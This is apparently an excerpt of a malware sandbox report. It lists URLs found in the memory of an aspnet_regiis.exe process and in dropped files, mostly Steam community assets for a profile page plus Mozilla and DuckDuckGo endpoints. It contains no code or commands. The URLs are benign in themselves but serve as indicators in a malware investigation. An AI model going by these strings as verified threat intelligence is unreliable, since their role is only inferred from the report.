                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
